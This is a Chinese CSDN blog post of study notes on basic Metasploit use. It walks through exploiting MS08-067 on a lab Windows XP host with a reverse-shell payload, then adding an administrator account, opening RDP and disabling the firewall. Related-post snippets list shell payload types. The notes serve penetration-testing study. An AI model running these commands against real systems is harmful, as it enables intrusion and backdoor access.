Msf 基本用法

最新推荐文章于 2024-05-08 17:20:32 发布
最新推荐文章于 2024-05-08 17:20:32 发布
阅读量586 收藏 1
点赞数
分类专栏: 渗透测试-msf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/freshfox/article/details/104556220
版权

 

 

 

Msf 基本用法

 

 

Msfconsole

Help

 

nmap -sn 192.168.208.0/24    主机发现

 

渗透攻击过程   需要xp用户登录系统后才可以利用成功。
 1.search MS08-067
 2. use  exploit/windows/smb/ms08_067_netapi

use exploit/windows/smb/ms08_067_netapi  
 3. show payloads
 4. set payload  generic/shell_reverse_tcp
 5. show targets
 6. show options
 7. set RHOST 192.168.208.166
 8. set LHOST 192.168.1.36
 9. exploit

 

 

提权过程

>net user lilei 123456 /add --添加用户
>net localgroup administrators lilei /add --将lilei添加到administrators用户组
>netstat -na --查看开放端口
>REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f --打开远程桌面3389端口
>netsh firewall set opmode disable --关闭防火墙

 

 

 

meterpreter

 

Ps

 

 

netstat -ano |findstr 4444  可以查出  meterpreter 建立的host 进程。 比如为984

Migrate   移到 explore.exe 进程后, 即使host 杀死984进程, host 中仍然可以通过netstat -ano |findstr 4444  看到 ,猜测此时的984 已经不是进程号而是线程号了。

 

跳板攻击:  待续

Payload : 待续

 

 

 

 

 

 

freshfox
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
MSF的使用教程
hackzkaq的博客
10-18 3万+
公众号:白帽子左一 MSF简介 Metasploit(MSF)是一个免费的、可下载的框架 它本身附带数百个已知软件漏洞,是一款专业级漏洞攻击工具。 当H.D. Moore在2003年发布Metasploit时,计算机安全状况也被永久性地改变了,仿佛一夜之间,任何人都可以成为黑客。 因为只要掌握MSF的使用方法,每个人都可以使用MSF来攻击那些未打过补丁或者刚刚打过补丁的漏洞。 也因此软件厂商再也不能推迟发布针对已公布漏洞的补丁了,因为Metasploit团队一直都在努力开发各种攻击工具,并将它们贡献给所.
MSF技术总结
05-07
二、MSF 基本使用和控制台命令 MSF Console 提供了丰富的命令,帮助用户快速完成渗透测试任务。常用的命令包括: * msfconsole:启动 MSF 控制台 * help:显示帮助信息 * -q:安静启动 MSF * -r:恢复以前的会话 *...
msf基本使用,基本命令说明
cjh12340826的博客
07-10 2232
xxx_nonx_tcp : no execute 或 win7 (NX是应用在cpu的一种可以防止缓冲区溢出的技术)shell_reverse_tcp:反向连接到攻击者主机并创建一个shell。reverse_http: 通过HTTP隧道通信并创建一个新用户添加到管理组。shell_find_tag: 在已建立的连接上创建一个shell。add_user :创建一个新用户添加到管理组。bind_tcp : 监听一个tcp连接。21,version显示一个控制台版本。7,info 显示一个模块的详细信息。
渗透测试-MSF工具使用简介及命令使用漏洞利用过程
最新发布
XLbb的博客
05-08 1555
1.MSF工具使用简介及命令使用(kali系统) 1.1什么是MSF: Metasploit就是一个漏洞框架,是一个免费、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数2000多个已知软件漏洞的专业级漏洞攻击工具。 步骤一:在kali系统中运行msf软件 :msfconsole; 如:测试编号为cve-2019-0708 的漏洞(windows7漏洞); 根据漏洞编号,用search查找相应的漏洞攻击工具。
网安之web攻防第二十六天
B_l_a_nk的博客
03-31 420
1、数据库注入-Oracle&Mongodb 2、数据库注入-DB2&SQLite&Sybase 3、SQL注入神器-SQLMAP安装使用拓展
Metasploit(MSF)使用详解
m0_74806866的博客
11-30 490
本篇文章通过一次渗透测试,向大家介绍关于Metasploit的使用、参数和渗透测试的应用
msf基础使用
longwanlian的博客
12-12 406
终端输入msfconsole。
内网MSF11111
01-05
另一种方法是先创建用户,再创建数据库,分别使用`createuser c4rt1y -P`(设置密码)和`createdb --owner=c4rt1y msf`。还可以在已登录到PostgreSQL的情况下创建用户和数据库,例如`sudo -u postgres psql`后,执行...
[ MSF ] Meterpreter扩展模块命令详解.docx
02-11
2. reverse_http 和 reverse_https:这些方法使用 HTTP 或 HTTPS 协议隐藏通信,增加了隐蔽性。 3. bind_tcp:这种模式下,Meterpreter 会在目标系统上开启一个监听端口,等待攻击者连接。 0x03 相关 Payload ...
战略概述及其基本框架.pptx
10-13
【战略概述及其基本框架】 战略概述是对一个组织长期发展方向和行动计划的高级描述,它涉及到如何在竞争激烈的市场环境中实现组织的愿景和使命。本手册基于McKinsey公司的战略咨询实践,提供了一个详尽的框架来理解...
SQLMAP使用笔记.pdf
01-25
一、SQLMAP 的基本使用 SQLMAP 的基本语法为:`sqlmap -u <url> [options]` 其中,`-u` 选项指定了要测试的 URL,`[options]` 是可选的参数和选项。 二、常用参数 1. `-f`:指定指纹判别数据库类型 2. `-b`:...
metasploit 使用教程
热门推荐
jiangliuzheng的专栏
01-20 10万+
METASPLOIT基础入门 1、基础知识 1.1 简介 Metasploit是一款开源安全漏洞检测工具,附带数百个已知的软件漏洞,并保持频繁更新。被安全社区冠以“可以黑掉整个宇宙”之名的强大渗透测试框架。 Metasploit Framework最初是 HD Moore 个人的想法,当时他在一家安全公司工作,他于2003年10月发布了第一个基于Perl的Metasp
MSF的简单使用
秋水的博客
10-09 2778
MSF简介 背景 Metasploit Framework最初是 HD Moore 个人的想法,当时他在一家安全公司工作,他于2003年10月发布了第一个基于Perl的Metasploit版本,一开始只有共11个漏洞利用程序。后来随着Spoonm帮助和加入,HD发布于2004年4月重写了该项目并发布了Metasploit2.0。此版本包括19个漏洞和超过27个payload。在这个版本之发布...
内网渗透之——msf工具使用
wsnbbz的博客
03-16 7128
1.msfconsole 作用: 管理生成exp,管理反弹的shell,通过反弹的shell进行后渗透。。。 模块介绍: exploits:攻击脚本 payloads:攻击载荷(攻击效果控制) auxiliaru:辅助模块(扫描工具等) post:后渗透模块(提取信息) encoders编码模块 nops:无操作生成器 2.msfvenom 作用: 制作木马 3.msfencode 作用: 对木马...
Metasploit入门用法(主动攻击)
shark-CV的博客
06-03 8万+
Metasploit入门用法(主动攻击) –作者:CV 本文主要讲metasploit的入门用法,还有一些渗透细节和思路,有不足的,欢迎互相学习研究。本人区别于书籍的特点是:书籍以模块为划分,我是以连续的步骤进行书写,更突出一次渗透的思路,同时我会通过强调步骤的细节技巧,用以拓展相关类容。
Metasploit基本用法
foryouslgme的博客
10-13 4005
【参考博客地址】【启动msf】#msfconsole msf >【搜索模块】msf > search portscan【使用对应模块】msf > use scanner/portscan/syn【查看当前模块的配置参数】msf auxiliary(hashcollision_dos) > show options Module options (auxiliary/dos/http/hashco
msfconsole 控制台使用和操作
xianjie0318的博客
08-07 2万+
Msfconsole提供了一个一体化的集中控制台。通过msfconsole,你可以访问和使用所有的metasploit的插件,payload,利用模块,post模块等等。Msfconsole还有第三方程序的接口,比如nmap,sqlmap等,可以直接在msfconsole里面使用。 在启动MSF终端之后,可以首先输入help命令列出MSF终端所支持的命令列表,包括核心命令集和后端数据库命令集。对于...
msf回退一步
aod83029的博客
10-18 1323
输入back 转载于:https://www.cnblogs.com/zheh/p/4032329.html
【学习笔记】msf的使用
chualam的博客
10-29 259
目标主机:2003rs2 漏洞:cve-2017-7269 ms17-010 exp搜索 : search cve-xxx 利用:use exp名称 看配置:show options 配置:set 配置名 一个值 设置payload:set payload windows/meterpreter/reverse_tcp(反弹shell) 最终攻击:exploit 把shell放后台:background 交互:session -l 然后 session -i 1 添加路由攻击内网:run autoroute
kali使用msf攻击win xp错误
05-18
很遗憾,您提供的信息太少了,我无法确定您遇到了什么错误。但是,通常在使用Metasploit Framework(MSF)攻击Windows XP时可能会出现各种错误。这可能涉及到网络连接问题、操作系统配置问题、MSF模块问题或其他问题。以下是您可能要考虑的一些常见问题和解决方法: 1. 确保Windows XP系统已经被漏洞利用程序所支持,并且系统已经被正确地配置,以便接受连接。 2. 确保你的Kali机器和Windows XP系统在同一网络中,并且能够相互通信。 3. 确保你的MSF版本是最新的,并且所有需要的模块都已经安装。 4. 确保你的payload是正确的,并且已经正确地配置。 5. 如果你遇到了错误,请先试着查看MSF的日志文件,以便确定错误的原因。 希望这些信息对您有所帮助。如果您需要更多的帮助,请提供更多的详细信息,我会尽力回答您的问题。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值